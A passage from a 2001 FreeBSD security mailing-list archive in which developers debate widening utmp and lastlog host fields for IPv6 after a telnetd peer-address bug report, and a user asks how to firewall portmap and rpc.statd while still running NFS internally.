IPv6 address with :`[' and `]' doesn't help without changing X side. : :-- :Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan :ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org :http://www.imasy.org/~ume/ Ok, it sounds like 56 bytes ought to be sufficient. This will increase the lastlog structure from 28 bytes to 68 bytes and the utmp/wtmp structure from 44 bytes to 84 bytes. A buildworld would be necessary to deal with the change and certrain ports, such as ftpd, would have to be rebuilt (for those people using them) to avoid corruption. utmp is one of the few structures in the system which is written out 'manually' by various programs, which is why . changing the size of the structure is so nasty. The issue with X is a separate problem. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 17: 2:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from purgatory.unfix.org (purgatory.xs4all.nl [194.109.237.229]) by hub.freebsd.org (Postfix) with ESMTP id 99AA237B401; Sun, 22 Jul 2001 17:02:43 -0700 (PDT) (envelope-from jeroen@unfix.org) Received: from HELL (hell.unfix.org [::ffff:10.100.13.66]) by purgatory.unfix.org (Postfix) with ESMTP id 49E55319E; Mon, 23 Jul 2001 02:02:36 +0200 (CEST) From: "Jeroen Massar" To: "'Matt Dillon'" , "'Hajimu UMEMOTO'" Cc: , , , , , Subject: RE: bin/22595: telnetd tricked into using arbitrary peer ip Date: Mon, 23 Jul 2001 01:58:33 +0200 Organization: Unfix Message-ID: <000701c1130a$393e27e0$420d640a@HELL> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006 Importance: Normal In-reply-to: <200107222257.f6MMvuE12313@earth.backplane.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matt Dillon wrote: > : 1234567890123456789012345678901234567890 > : NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN%fxp0\n > : > :There is one more consideration. `:' is conflict with X. I have no > :particular idea to solve this problem. Enclosing IPv6 address with > :`[' and `]' doesn't help without changing X side. > : > Ok, it sounds like 56 bytes ought to be sufficient. This will > increase the lastlog structure from 28 bytes to 68 bytes > and the utmp/wtmp structure from 44 bytes to 84 bytes. A > buildworld would be necessary to deal with the change and > certrain ports, such as ftpd, would have to be rebuilt > (for those people using them) to avoid corruption. utmp > is one of the few structures in the system which is > written out 'manually' by various programs, which is why > . changing the size of the structure is so nasty. > > The issue with X is a separate problem. And what if we get IP18 in a couple of years? Resize again??? Better to change it to: char Hostname[size]; char Address[size]; int AddressType; // AF_INET6, AF_INET, AF_* whatever... these are standardized (kinda :) And ofcourse... For 'filling' these info's there should be standard functions, for reading it too (in different formats ofcourse ;)... Which makes sure that you don't have to upgrade every util whenever the format of that file changes again.... If at all it stays a file in the future... Even then.... IMHO one should log both hostname _AND_ IP... Following situation: 23 June 2001 - I log into a machine from 10.1.2.3 which maps to bla.example.com which points to 10.1.2.3 thus bla.example.com is logged... 24 June 2001 - The bla.example.com A is changed to 192.168.2.1, 192.168.2.1 gets pointed back to bla.example.com... Now I actually did very evil things with that box on the 23rd.... So the admin of the box wants to hunt me down and checks his/her/it's logs: Ooe..... that evil user came from 'bla.example.com' let's find out his/her/it's IP....aha 192.168.2.1 <-------- OOOPS... Not even the same provider I actually came from to do all those very evil things... So long for your 'nice' loggin facility... (and thanks for all the fish... :) I know... It's been there for a long time and over many many unices but that doesn't say it's still acceptable... Only storing the IP is useless too ofcourse.. Because then you never know what the old hostname (for which you actually accepted) was... Especially if you got /etc/hosts.allow with the old reverse in it, but not the new one etc... Greets, Jeroen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 17: 7:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 0D0D237B406 for ; Sun, 22 Jul 2001 17:07:29 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us) Received: from jimslaptop.int (jimslaptop.int [192.168.5.8]) by w2xo.pgh.pa.us (8.11.3/8.11.3) with ESMTP id f6N0F7m29933; Sun, 22 Jul 2001 20:15:08 -0400 (EDT) (envelope-from durham@w2xo.pgh.pa.us) Date: Sun, 22 Jul 2001 20:07:38 -0400 (EDT) From: Jim Durham X-X-Sender: To: serkoon Cc: Subject: Re: rpc.statd attacks In-Reply-To: <002e01c1129c$5b0ef6b0$0200000a@kilmarnock> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 22 Jul 2001, serkoon wrote: > > However, since I have port 111 blocked in the firewall, > > how in the world is even an error message being generated? > > I have even portscanned and 111 is not open to the outside. > > Firewall UDP:111 or kill portmapd (if you don't need it). > I'm using NFS internally, so I need portmapd and 111 udp is blocked. That's what is bothering me.. -Jim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 17:12:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.ipfw.org (cr308584-a.wlfdle1.on.wave.home.com [24.114.52.208]) by hub.freebsd.org (Postfix) with ESMTP id 692BF37B401 for ; Sun, 22 Jul 2001 17:12:25 -0700 (PDT) (envelope-from pccb@yahoo.com) Received: from apollo (apollo.objtech.com [192.168.111.5]) by mail.ipfw.org (Postfix) with ESMTP id 2D8BF3115; Sun, 22 Jul 2001 20:12:24 -0400 (EDT) Date: Sun, 22 Jul 2001 20:12:24 -0400 From: Peter Chiu X-Mailer: The Bat! (v1.53bis) Reply-To: Peter Chiu X-Priority: 3 (Normal) Message-ID: <11065209255.20010722201224@ipfw.org> To: Jim Durham Cc: serkoon , freebsd-security@FreeBSD.ORG Subject: Re: rpc.statd attacks In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Jim, SYNOPSIS portmap [-d] [-v] [-h bindip] You can just bind it to your internal IP. Sunday, July 22, 2001, 8:07:38 PM, you wrote: JD> On Sun, 22 Jul 2001, serkoon wrote: JD> I'm using NFS internally, so I need portmapd and 111 udp is JD> blocked. That's what is bothering me.. -- Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 17:18: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id EF1C737B403 for ; Sun, 22 Jul 2001 17:17:57 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us) Received: from jimslaptop.int (jimslaptop.int [192.168.5.8]) by w2xo.pgh.pa.us (8.11.3/8.11.3) with ESMTP id f6N0Plm29972; Sun, 22 Jul 2001 20:25:47 -0400 (EDT) (envelope-from durham@w2xo.pgh.pa.us) Date: Sun, 22 Jul 2001 20:18:12 -0400 (EDT) From: Jim Durham X-X-Sender: To: serkoon Cc: Subject: Re: rpc.statd attacks In-Reply-To: <002501c112f2$208d47c0$0200000a@kilmarnock> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 22 Jul 2001, serkoon wrote: > Chris wrote: > > > Don't "block" port 111. Pass only traffic you want and expect, block > > everything else by default. > > Yes, I should have made that more clear, but since I don't have it setup > that way, at least for UDP, it didn't occur to me. One should use > stateful filtering for this to work right. (Don't ever allow udp from any:53 > to $yourip). > > With regards > I'm not allowing packets "in via outside_interface", either tcp or udp to port 111. Obviously, if I blocked 111 internally, my NFS would quit! I gather this is wrong. Would someone explain why? -Jim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 17:18:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 9AD2137B406; Sun, 22 Jul 2001 17:18:15 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6N0ICI00840; Mon, 23 Jul 2001 01:18:13 +0100 (BST) (envelope-from brian@lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6MNtGg11536; Mon, 23 Jul 2001 00:55:16 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200107222355.f6MNtGg11536@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: Matt Dillon Cc: Hajimu UMEMOTO , aschneid@mail.slc.edu, brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip In-Reply-To: Message from Matt Dillon of "Sun, 22 Jul 2001 15:57:56 PDT." <200107222257.f6MMvuE12313@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 23 Jul 2001 00:55:16 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > :>>>>> On Sun, 22 Jul 2001 17:22:32 -0400 > :>>>>> Anthony Schneider said: > : > :aschneid> 16 bytes. > : > :It's a binary form. We need 40 bytes for global address. To save > :site-local or link-local address, we need more space for scope > :identifier. I believe the length of scope identifier is not defined > :and system specific. > : > :global address: > : > : 1234567890123456789012345678901234567890 > : NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN\n > : > :scoped address: > : > : 1234567890123456789012345678901234567890 > : NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN%fxp0\n > : > :There is one more consideration. `:' is conflict with X. I have no > :particular idea to solve this problem. Enclosing IPv6 address with > :`[' and `]' doesn't help without changing X side. > : > :-- > :Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan > :ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org > :http://www.imasy.org/~ume/ > > Ok, it sounds like 56 bytes ought to be sufficient. This will > increase the lastlog structure from 28 bytes to 68 bytes > and the utmp/wtmp structure from 44 bytes to 84 bytes. A > buildworld would be necessary to deal with the change and > certrain ports, such as ftpd, would have to be rebuilt > (for those people using them) to avoid corruption. utmp > is one of the few structures in the system which is > written out 'manually' by various programs, which is why > . changing the size of the structure is so nasty. I think an API should really be introduced if we're going to do this - there's no point in doing only half the job :-/ I'm no great expert with IPv6, but if the scoping needs to be recorded here, who can guarantee that the length of the interface name will fit (remember, interface numbers can easily be something like 10000 -- think ifconfig gif10000 create, and that's not even considering the name itself having no limits as far as I'm aware). Besides, we also need an address family field. It seems that part of the problem described in this PR is the fact that running ``login -p hostname blah'' results in login(1) doing a reverse lookup on hostname - assuming it's IPv4. w(1) does the same. > The issue with X is a separate problem. The X-style ``machine:screen'' thing doesn't conflict as an IPv6 address will always have at least two ``:''s in it and an X entry will only ever have one. > -Matt -- Brian http://www.freebsd-services.com/ Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 17:25:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 92F2337B405 for ; Sun, 22 Jul 2001 17:25:19 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us) Received: from jimslaptop.int (jimslaptop.int [192.168.5.8]) by w2xo.pgh.pa.us (8.11.3/8.11.3) with ESMTP id f6N0XAm29999; Sun, 22 Jul 2001 20:33:11 -0400 (EDT) (envelope-from durham@w2xo.pgh.pa.us) Date: Sun, 22 Jul 2001 20:25:32 -0400 (EDT) From: Jim Durham X-X-Sender: To: Peter Chiu Cc: serkoon , Subject: Re: rpc.statd attacks In-Reply-To: <11065209255.20010722201224@ipfw.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 22 Jul 2001, Peter Chiu wrote: > Hello Jim, > > SYNOPSIS > portmap [-d] [-v] [-h bindip] > > You can just bind it to your internal IP. > > > Sunday, July 22, 2001, 8:07:38 PM, you wrote: > > > JD> On Sun, 22 Jul 2001, serkoon wrote: > > JD> I'm using NFS internally, so I need portmapd and 111 udp is > JD> blocked. That's what is bothering me.. > > -- OK, I was unaware of *that*, but it did remind me of something else... I *do* have portmap in my hosts.allow for LAN addresses only (I'm running natd with private addresses on the LAN, and all NFS stuff flows on those addresses). I'll also do what you suggested. -Jim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 17:25:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 0373337B407; Sun, 22 Jul 2001 17:25:20 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6N0PII00884; Mon, 23 Jul 2001 01:25:18 +0100 (BST) (envelope-from brian@lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6N0PHg12049; Mon, 23 Jul 2001 01:25:17 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200107230025.f6N0PHg12049@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: "Jeroen Massar" Cc: "'Matt Dillon'" , "'Hajimu UMEMOTO'" , aschneid@mail.slc.edu, brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip In-Reply-To: Message from "Jeroen Massar" of "Mon, 23 Jul 2001 01:58:33 +0200." <000701c1130a$393e27e0$420d640a@HELL> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 23 Jul 2001 01:25:17 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Even then.... IMHO one should log both hostname _AND_ IP... I don't think that's necessary. > Following situation: > > 23 June 2001 - I log into a machine from 10.1.2.3 which maps to > bla.example.com which points to 10.1.2.3 thus bla.example.com is > logged... > 24 June 2001 - The bla.example.com A is changed to 192.168.2.1, > 192.168.2.1 gets pointed back to bla.example.com... > > Now I actually did very evil things with that box on the 23rd.... So the > admin of the box wants to hunt me down and checks his/her/it's logs: > Ooe..... that evil user came from 'bla.example.com' let's find out > his/her/it's IP....aha 192.168.2.1 <-------- OOOPS... Not even the same > provider I actually came from to do all those very evil things... > > So long for your 'nice' loggin facility... (and thanks for all the > fish... :) I know... It's been there for a long time and over many many > unices but that doesn't say it's still acceptable... The owner of what's logged will know the answer -- in this case, talking to the admins of bla.example.com will result in them saying ``ah, that box had it's IP number changed''. I think the way this is done is as appropriate as it ever was. > Only storing the IP is useless too ofcourse.. Because then you never > know what the old hostname (for which you actually accepted) was... > Especially if you got /etc/hosts.allow with the old reverse in it, but > not the new one etc... Your tcp-wrapper rules are subject to the same DNS confusion as the utmp file is, but I don't think there's anything wrong with that. If you don't trust the admin of example.com, then block the whole domain :) But that's another argument^Wdiscussion.... > Greets, > Jeroen -- Brian http://www.freebsd-services.com/ Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 17:33:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 0DA1637B406 for ; Sun, 22 Jul 2001 17:33:44 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us) Received: from jimslaptop.int (jimslaptop.int [192.168.5.8]) by w2xo.pgh.pa.us (8.11.3/8.11.3) with ESMTP id f6N0fcm30026; Sun, 22 Jul 2001 20:41:38 -0400 (EDT) (envelope-from durham@w2xo.pgh.pa.us) Date: Sun, 22 Jul 2001 20:33:57 -0400 (EDT) From: Jim Durham X-X-Sender: To: Peter Chiu Cc: serkoon , Subject: Re: rpc.statd attacks In-Reply-To: <11065209255.20010722201224@ipfw.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 22 Jul 2001, Peter Chiu wrote: > Hello Jim, > > SYNOPSIS > portmap [-d] [-v] [-h bindip] > > You can just bind it to your internal IP. > > > Sunday, July 22, 2001, 8:07:38 PM, you wrote: > > > JD> On Sun, 22 Jul 2001, serkoon wrote: > > JD> I'm using NFS internally, so I need portmapd and 111 udp is > JD> blocked. That's what is bothering me.. > > -- Actually, my man page doesn't show the -v argument.. hosts_access(5) is suggested, which I have done. -Jim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 18:20:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from purgatory.unfix.org (purgatory.xs4all.nl [194.109.237.229]) by hub.freebsd.org (Postfix) with ESMTP id CDC2637B42F; Sun, 22 Jul 2001 18:20:08 -0700 (PDT) (envelope-from jeroen@unfix.org) Received: from HELL (hell.unfix.org [::ffff:10.100.13.66]) by purgatory.unfix.org (Postfix) with ESMTP id 67011319E; Mon, 23 Jul 2001 03:20:02 +0200 (CEST) From: "Jeroen Massar" To: "'Brian Somers'" Cc: "'Matt Dillon'" , "'Hajimu UMEMOTO'" , , , , , Subject: RE: bin/22595: telnetd tricked into using arbitrary peer ip Date: Mon, 23 Jul 2001 03:15:59 +0200 Organization: Unfix Message-ID: <000f01c11315$094851e0$420d640a@HELL> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006 Importance: Normal In-reply-to: <200107230025.f6N0PHg12049@hak.lan.Awfulhak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Behalf Of Brian Somers wrote: > > > Even then.... IMHO one should log both hostname _AND_ IP... That's why I put the IMHO in there ;) > > I don't think that's necessary. > > > Following situation: > > > > 23 June 2001 - I log into a machine from 10.1.2.3 which maps to > > bla.example.com which points to 10.1.2.3 thus bla.example.com is > > logged... > > 24 June 2001 - The bla.example.com A is changed to 192.168.2.1, > > 192.168.2.1 gets pointed back to bla.example.com... > > > > Now I actually did very evil things with that box on the > 23rd.... So the > > admin of the box wants to hunt me down and checks his/her/it's logs: > > Ooe..... that evil user came from 'bla.example.com' let's find out > > his/her/it's IP....aha 192.168.2.1 <-------- OOOPS... Not > even the same > > provider I actually came from to do all those very evil things... > > > > So long for your 'nice' loggin facility... (and thanks for all the > > fish... :) I know... It's been there for a long time and > over many many > > unices but that doesn't say it's still acceptable... > > The owner of what's logged will know the answer -- in this case, > talking to the admins of bla.example.com will result in them saying > ``ah, that box had it's IP number changed''. I think the way this is > done is as appropriate as it ever was. Hmm... Okay.... Kind of bad reasoning.... But unless logsize is in question I don't think nobody will object to having both the IP and hostname in the file... Surely because of the confusion part... And the fact that an evil admin won't reply, but that will give the same problems :) And probably an admin doesn't even know where the host was before as they either work in teams or maybe could have been put there temporary by another evil intruder or something :) Now if that isn't farfetched > > Only storing the IP is useless too ofcourse.. Because then you never > > know what the old hostname (for which you actually accepted) was... > > Especially if you got /etc/hosts.allow with the old reverse > in it, but > > not the new one etc... > > Your tcp-wrapper rules are subject to the same DNS confusion as the > utmp file is, but I don't think there's anything wrong with that. If > you don't trust the admin of example.com, then block the whole domain > :) But that's another argument^Wdiscussion.... Problem being... hacked stuff.... blabla... other discussion :) At least we are now at the point where everybody (it is everybody not? :) sees that the logging is doing very wrong (SUX :) things... :) About the API thing..... Check the other mail... I also suggested it there... One thing that should be considered to be done if an API is created... : make a backport to previous versions of FreeBSD and actually *BSD/Linux/* :) This also encourages program writers/maintainers to adopt it quicker, as it's less hassle for them and they don't have to make the "pre-FreeBSD-5" case or something... And the best thing of an API (if done right :): seperation of the back and the frontend... which makes changes like this even easier... Greets, Jeroen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 20:55: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 4FD4237B406; Sun, 22 Jul 2001 20:55:03 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6N3stj13517; Sun, 22 Jul 2001 20:54:55 -0700 (PDT) (envelope-from dillon) Date: Sun, 22 Jul 2001 20:54:55 -0700 (PDT) From: Matt Dillon Message-Id: <200107230354.f6N3stj13517@earth.backplane.com> To: "Jeroen Massar" Cc: "'Brian Somers'" , "'Hajimu UMEMOTO'" , , , , , Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip References: <000f01c11315$094851e0$420d640a@HELL> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org All very nice, guys, but not realistic. Only FreeBSD uses an API. Third party programs access the structure directly for the most part so adding new fields to the structure will just cause more garbage to be written to the file (many third party programs don't bother to bzero the structure before writing it out). We aren't going to add a separate hostname[] array... we just got through ripping out the hostname crap, because there was never enough room in the field to actually store the FQDN, and many programs don't bother to verify the forward against the reverse anyway so the data would be suspect. And short of making a 200+ character array to hold it, which would be masive bloat, there is no way to fit it in the structure. If you want to store host names for posterity you will have to log-process the file and store the results somewhere else. Every program under the sun assumes utmp is a fixed-length structure. Pretty much our only option is to extend the size of existing fields and take the 'oh hell the structure size changed' hit. i -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 3:12:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 03A1237B407; Mon, 23 Jul 2001 03:12:46 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6NAChI03739; Mon, 23 Jul 2001 11:12:43 +0100 (BST) (envelope-from brian@lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6NACgg60192; Mon, 23 Jul 2001 11:12:42 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200107231012.f6NACgg60192@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: Matt Dillon Cc: "Jeroen Massar" , "'Brian Somers'" , "'Hajimu UMEMOTO'" , aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip In-Reply-To: Message from Matt Dillon of "Sun, 22 Jul 2001 20:54:55 PDT." <200107230354.f6N3stj13517@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 23 Jul 2001 11:12:42 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > All very nice, guys, but not realistic. Only FreeBSD uses an API. > Third party programs access the structure directly for the most > part so adding new fields to the structure will just cause more > garbage to be written to the file (many third party programs > don't bother to bzero the structure before writing it out). We > aren't going to add a separate hostname[] array... we just got > through ripping out the hostname crap, because there was never > enough room in the field to actually store the FQDN, and many > programs don't bother to verify the forward against the > reverse anyway so the data would be suspect. And short > of making a 200+ character array to hold it, which would be masive > bloat, there is no way to fit it in the structure. If you want to store > host names for posterity you will have to log-process the file and > store the results somewhere else. Every program under the sun assumes > utmp is a fixed-length structure. > > Pretty much our only option is to extend the size of existing fields > and take the 'oh hell the structure size changed' hit. Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0). Any disagreements ? Should this be brought up (explained) on -arch now ? > i -Matt -- Brian http://www.freebsd-services.com/ Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 4:17:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 09E8437B41C; Mon, 23 Jul 2001 04:17:47 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6NBHZI04007; Mon, 23 Jul 2001 12:17:35 +0100 (BST) (envelope-from brian@lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6NBHYg61233; Mon, 23 Jul 2001 12:17:34 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200107231117.f6NBHYg61233@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: Matt Dillon Cc: Jeroen Massar , Brian Somers , Hajimu UMEMOTO , aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip In-Reply-To: Message from Brian Somers of "Mon, 23 Jul 2001 03:20:02 PDT." <200107231020.f6NAK2f98702@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 23 Jul 2001 12:17:34 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matt wrote: > > Pretty much our only option is to extend the size of existing fields > > and take the 'oh hell the structure size changed' hit. I wrote: > Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only > put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0). > > Any disagreements ? Should this be brought up (explained) on -arch > now ? Interestingly enough, OpenBSD has UT_HOSTSIZE set to 256. -- Brian http://www.freebsd-services.com/ Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 6:19: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from purgatory.unfix.org (purgatory.xs4all.nl [194.109.237.229]) by hub.freebsd.org (Postfix) with ESMTP id 45DED37B405; Mon, 23 Jul 2001 06:18:55 -0700 (PDT) (envelope-from jeroen@unfix.org) Received: from HELL (hell.unfix.org [::ffff:10.100.13.66]) by purgatory.unfix.org (Postfix) with ESMTP id 9D57C319E; Mon, 23 Jul 